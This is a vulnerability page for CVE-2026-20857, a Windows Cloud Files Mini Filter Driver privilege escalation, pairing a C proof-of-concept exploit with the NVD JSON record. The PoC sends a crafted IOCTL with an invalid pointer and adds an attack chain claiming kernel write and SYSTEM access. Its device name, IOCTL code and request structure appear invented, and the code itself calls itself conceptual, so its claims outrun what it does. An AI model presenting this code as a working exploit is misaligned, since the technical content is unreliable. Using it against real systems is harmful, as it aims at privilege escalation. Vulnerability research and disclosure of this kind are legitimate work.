CVE-2026-20857

// CVE-2026-20857 PoC - Windows Cloud Files Mini Filter Driver Local Privilege Escalation // This is a conceptual PoC demonstrating the attack vector // Actual exploitation requires specific environment conditions #include <windows.h> #include <stdio.h> // IOCTL code for Cloud Files Mini Filter Driver communication #define FILE_DEVICE_CLOUD_FILES 0x00009000 #define IOCTL_CF_MINI_FILTER_OPERATION CTL_CODE(FILE_DEVICE_CLOUD_FILES, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS) typedef struct _CLOUD_FILES_REQUEST { ULONG OperationType; PVOID UntrustedPointer; // Pointer that won't be validated ULONG PointerSize; } CLOUD_FILES_REQUEST, *PCLOUD_FILES_REQUEST; int main() { HANDLE hDevice; CLOUD_FILES_REQUEST Request; DWORD ReturnBytes; BOOL Success; printf("[*] CVE-2026-20857 PoC - Local Privilege Escalation\n"); printf("[*] Target: Windows Cloud Files Mini Filter Driver\n"); // Open handle to the Cloud Files Mini Filter Driver device hDevice = CreateFile( "\\\\.\\CloudFilesMiniFilter", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device handle. Error: %d\n", GetLastError()); return 1; } printf("[+] Device handle opened successfully\n"); // Prepare malicious request with untrusted pointer Request.OperationType = 0x01; // Specific operation that triggers vulnerability Request.UntrustedPointer = (PVOID)0xFFFFFFFF; // Invalid kernel pointer Request.PointerSize = sizeof(PVOID); // Send IOCTL request to trigger untrusted pointer dereference Success = DeviceIoControl( hDevice, IOCTL_CF_MINI_FILTER_OPERATION, &Request, sizeof(Request), NULL, 0, &ReturnBytes, NULL ); if (!Success) { printf("[-] IOCTL request failed. Error: %d\n", GetLastError()); printf("[*] Note: This may indicate the vulnerability is patched or conditions not met\n"); } else { printf("[+] IOCTL request completed - possible vulnerability trigger\n"); } CloseHandle(hDevice); return 0; } /* [*] Attack Chain: 1. Attacker obtains low-privilege access to Windows system 2. Attacker identifies Cloud Files Mini Filter Driver is loaded 3. Attacker crafts malicious IO request with invalid pointer 4. Driver dereferences untrusted pointer without validation 5. Attacker achieves arbitrary kernel memory write 6. Attacker escalates privileges to SYSTEM level 7. Attacker gains full control of the compromised system */

{"cve": {"id": "CVE-2026-20857", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:14.480", "lastModified": "2026-01-15T15:21:42.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Untrusted pointer dereference in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally."}, {"lang": "es", "value": "Desreferencia de puntero no confiable en el controlador de minifiltro de archivos en la nube de Windows permite a un atacante autorizado elevar privilegios localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-822"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "DD4CBDAB-7626-4048-8474-B1BD9C1F3255"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A6D4C631-2CC0-407C-9ACA-7C151006598C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "1895E186-5B2E-43CC-AF1F-B5C95419D8C5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "B7CB5184-1BA1-4D71-8AE3-CF4C6B63A469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "8D675DAA-4DCE-4727-BE5F-C954BBD252C4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "D249551B-1433-4E5E-A587-40F782E91E09"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "22082D4E-E68F-4E48-98FB-42DFDEE2E2A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A74970A1-CC81-4482-B465-8382B1544EF3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4648", "matchCriteriaId": "C4AA6991-DE34-48F6-AFD3-77CEE7FBB692"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2092", "matchCriteriaId": "BA5947E0-C44C-4517-A307-DA79752F30A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32230", "matchCriteriaId": "D44880ED-E8E9-49A8-BD56-503C63D40000"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20857", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}